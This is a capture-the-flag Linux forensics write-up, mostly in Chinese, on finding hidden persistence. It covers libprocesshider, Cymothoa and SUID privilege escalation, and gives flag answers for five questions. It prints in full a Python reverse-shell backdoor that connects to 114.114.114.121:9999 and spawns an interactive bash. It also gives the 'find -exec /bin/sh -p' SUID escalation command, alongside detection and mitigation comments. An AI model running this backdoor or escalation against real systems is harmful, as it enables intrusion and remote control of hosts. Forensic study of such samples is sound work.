linux权限维持-隐藏

1.黑客隐藏的文件 完整路径md5

在/tmp有一个.temp目录,发现是libprocesshider,是用于隐藏进程的工具(源码注释写明:匹配该名字的进程都会被排除)

https://github.com/gianlucaborello/libprocesshider

root@xuanji:/tmp/.temp/libprocesshider# cat processhider.c 
/*
 * Head of processhider.c (libprocesshider) as recovered from /tmp/.temp.
 * Only the first lines of the file are shown on this page; the function that
 * performs the hiding comes later in the file and is not visible here.
 */
#define _GNU_SOURCE

#include <stdio.h>
#include <dlfcn.h>   /* dlsym(): consistent with an LD_PRELOAD wrapper that looks up the real libc symbol -- hook itself not shown here */
#include <dirent.h>  /* readdir()/struct dirent: directory listing is what gets filtered */
#include <string.h>
#include <unistd.h>

/*
* Every process with this name will be excluded
*
* Forensic note: the filter string is the name of the backdoor script found in
* the same directory (1.py), so the hidden artefact in question 1 is that file.
* Detection: a process visible in /proc but absent from ps/top output, or an
* unexpected entry in /etc/ld.so.preload or in LD_PRELOAD, points at this
* technique.
*/
static const char* process_to_filter = "1.py";

隐藏的文件是1.py

/tmp/.temp/libprocesshider/1.py

flag{109ccb5768c70638e24fb46ee7957e37}

2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}

root@xuanji:/tmp/.temp/libprocesshider# cat 1.py 
#!/usr/bin/python3
# Forensic annotation of the hidden 1.py (question 2). Indentation was lost when
# the listing was pasted, so the text as shown is not runnable; the code lines are
# kept byte-for-byte and only comments were added.
# What the listing shows: two fork() calls around setsid() (detaches from the
# controlling terminal), cwd set to "/", stdout/stderr sent to /dev/null, then an
# endless loop that connects to 114.114.114.121:9999, duplicates the socket onto
# fds 0/1/2 and spawns "/bin/bash -i"; any exception is swallowed and the loop
# retries after 2 seconds.
# Detection IoCs: outbound TCP to 114.114.114.121:9999; a bash -i whose stdin/
# stdout/stderr are a socket; a python3 process with cwd "/" and no tty
# (presumably reparented to pid 1 after the double fork -- verify on the host).

import socket,subprocess,os,sys, time

pidrg = os.fork()
if pidrg > 0:
sys.exit(0)  # first parent exits; the child continues

os.chdir("/")
os.setsid()   # new session: no controlling terminal, survives the login shell
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
sys.exit(0)  # second parent exits; the grandchild is the long-lived backdoor

while 1:
try:
sys.stdout.flush()
sys.stderr.flush()
fdreg = open("/dev/null", "w")  # a new handle is opened on every pass and never closed
sys.stdout = fdreg
sys.stderr = fdreg
sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sdregs.connect(("114.114.114.121",9999))  # C2 address:port -- the answer to question 2
os.dup2(sdregs.fileno(),0)
os.dup2(sdregs.fileno(),1)
os.dup2(sdregs.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])  # blocks until the remote side closes the shell
sdregs.close()
except Exception:
pass  # connection refused / reset etc. are ignored so the beacon keeps retrying
time.sleep(2)  # reconnect interval

flag{114.114.114.121:9999}

3.黑客提权所用的命令 完整路径的md5 flag{md5}

上传 linpeas 扫描,得到 SUID 文件列表:

-rwsr-xr-x. 1 root root 93K Nov 23  2016 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x. 1 root root 44K May 7 2014 /bin/ping
-rwsr-xr-x. 1 root root 44K May 7 2014 /bin/ping6
-rwsr-xr-x. 1 root root 37K May 16 2017 /bin/su
-rwsr-xr-x. 1 root root 68K Nov 23 2016 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x. 1 root root 46K May 16 2017 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x. 1 root root 41K May 16 2017 /usr/bin/chsh
-rwsr-xr-x. 1 root root 225K Jan 6 2014 /usr/bin/find
-rwsr-xr-x. 1 root root 71K May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 36K May 16 2017 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x. 1 root root 46K May 16 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x. 1 root root 152K May 29 2017 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x. 1 root root 10K Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x. 1 root root 431K Mar 4 2019 /usr/lib/openssh/ssh-keysign

可以通过/usr/bin/find命令的SUID位进行提权

# Reproduction of the find SUID escalation (question 3).
# The first line is a lab-only setup step: it copies find into the current
# directory with the setuid/setgid bits (-m =xs). On the compromised host it was
# not needed, because /usr/bin/find itself already carried the setuid bit (see the
# linpeas listing above) -- that bit is the misconfiguration to remove.
sudo install -m =xs $(which find) .

# -exec runs /bin/sh for the first match and -quit stops find afterwards; -p makes
# sh keep the elevated effective uid granted by the setuid bit.
# Mitigation: chmod u-s on find and periodic audits of setuid binaries
# (find / -perm -4000). A shell whose parent process is find is a high-confidence
# detection signal.
./find . -exec /bin/sh -p \; -quit

flag{7fd5884f493f4aaf96abee286ee04120}

4.黑客尝试注入恶意代码的工具完整路径md5

在/opt还有一个隐藏目录.cymothoa-1-beta

Cymothoa 是一款可以将 shellcode 注入到现有进程的(即插进程)后门工具。借助这种注入手段,它能够把shellcode伪装成常规程序

/opt/.cymothoa-1-beta/cymothoa

flag{087c267368ece4fcf422ff733b51aed9}

5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}

这里的文件指的是之前的1.py

# Step for question 5. Executing the sample starts the backdoor analysed above
# (daemonises and dials 114.114.114.121:9999), so do this only in an isolated lab
# with no outbound network; the interpreter path can also be resolved without
# running anything, e.g. readlink -f /usr/bin/python3.
python3 /tmp/.temp/libprocesshider/1.py
# /usr/bin/python3 is a symlink, which is why the answer is the resolved target
# (python3.4) rather than the link itself.
ls -la /usr/bin/python3

发现 /usr/bin/python3 是指向 python3.4 的软链接

flag{/usr/bin/python3.4}